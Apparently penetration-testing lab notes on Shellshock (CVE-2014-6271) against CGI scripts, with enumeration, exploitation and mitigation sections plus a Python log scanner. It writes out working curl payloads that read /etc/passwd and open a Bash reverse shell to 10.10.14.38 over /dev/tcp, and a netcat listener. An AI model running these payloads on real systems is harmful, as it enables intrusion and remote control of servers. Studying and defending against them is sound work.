18. Attacking CGI Applications - Shellshock

1. Vulnerability Overview

CVE-2014-6271 - Shellshock

  • Description: A critical vulnerability in Bash that allows arbitrary command execution through manipulated environment variables.

  • Cause: Bash versions up to 4.3 improperly handle function definitions in environment variables.

  • Impact: Can lead to remote code execution in the context of the web server user, often via CGI scripts.
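As an added example (not part of the original notes), the following Python script shows the mechanism described above from the defender's side: it maps request headers to the CGI environment variable names a web server exports, flags any value an unpatched Bash would parse as an exported function definition, and applies the same check to Apache combined-format access-log lines. The header-to-variable mapping, the log format and the sample log lines are assumptions constructed for the example, not taken from the page.

```python
import re

# An exported Bash function is stored as `() { body; }` at the start of the
# variable value; unpatched Bash kept parsing past the closing brace and ran
# whatever followed. Match that prefix, tolerating whitespace variants.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")

def cgi_env_from_headers(headers):
    """Map request headers to the CGI environment names a server exports,
    e.g. User-Agent -> HTTP_USER_AGENT, Referer -> HTTP_REFERER."""
    return {"HTTP_" + n.upper().replace("-", "_"): v for n, v in headers.items()}

def find_shellshock(headers):
    """Return (env_var, value) pairs an unpatched Bash would parse as a
    function definition when the CGI script is started."""
    env = cgi_env_from_headers(headers)
    return [(k, v) for k, v in env.items() if SHELLSHOCK_RE.search(v)]

# Apache combined log: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"$')

def scan_access_log(lines):
    """Return (client_ip, request, field, value) for each line whose Referer
    or User-Agent field carries a Shellshock-style payload."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, request, _status, referer, ua = m.groups()
        for field, value in (("referer", referer), ("user_agent", ua)):
            if SHELLSHOCK_RE.search(value):
                hits.append((ip, request, field, value))
    return hits

# Constructed sample log lines (hypothetical traffic), not from a real server.
SAMPLE_LOG = [
    '10.10.14.38 - - [10/Oct/2023:12:00:01 +0000] "GET /cgi-bin/access.cgi HTTP/1.1" '
    '500 0 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"',
    '203.0.113.7 - - [10/Oct/2023:12:00:02 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [10/Oct/2023:12:00:03 +0000] "GET /cgi-bin/access.cgi HTTP/1.1" '
    '500 0 "() { :; }; echo vulnerable" "curl/8.0.1"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("possible Shellshock probe from %s on %s via %s: %r" % hit)
```

The same prefix check on HTTP_* variables is what a WAF rule or a CGI wrapper would apply before handing the request to a Bash script.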


2. Enumeration

Discover CGI Scripts (Gobuster)

Identify potentially vulnerable scripts in the /cgi-bin/ directory.

gobuster dir -u http://10.129.204.231/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi

Verify CGI Script Accessibility (cURL)

Check for an active CGI script that could be vulnerable.

curl -i http://10.129.204.231/cgi-bin/access.cgi

3. Exploitation

Confirm Vulnerability (cURL)

Inject a malicious function definition into the User-Agent header to read the /etc/passwd file. The two echo commands emit the blank line that terminates the HTTP response headers, so the command output is returned in the response body instead of being rejected by the server as a malformed header.

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://10.129.204.231/cgi-bin/access.cgi

Execute a Reverse Shell (cURL)

Inject a reverse shell payload into the User-Agent header.

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1' http://10.129.204.231/cgi-bin/access.cgi

Set Up a Netcat Listener

Prepare to catch the reverse shell on port 7777.

sudo nc -lvnp 7777

4. Mitigation

Update Bash

Upgrade to a patched Bash version to close the vulnerability.

Firewalling

Restrict external access to CGI scripts via firewall rules.

Decommission Vulnerable Hosts

If possible, remove or replace outdated systems running vulnerable Bash versions.


5. Key Takeaways

  • Shellshock is exploited via environment variables, often targeting CGI scripts.

  • The User-Agent header is a common attack vector for injecting payloads.

  • Updating Bash is the best way to mitigate the vulnerability.

  • Always test only with explicit permission.

  • Replace IP addresses and ports with target-specific information.


6. Commands Summary

# Gobuster - Discover CGI scripts
gobuster dir -u http://10.129.204.231/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi

# cURL - Verify CGI script accessibility
curl -i http://10.129.204.231/cgi-bin/access.cgi

# cURL - Confirm vulnerability
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://10.129.204.231/cgi-bin/access.cgi

# cURL - Execute reverse shell
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1' http://10.129.204.231/cgi-bin/access.cgi

# Netcat listener
sudo nc -lvnp 7777
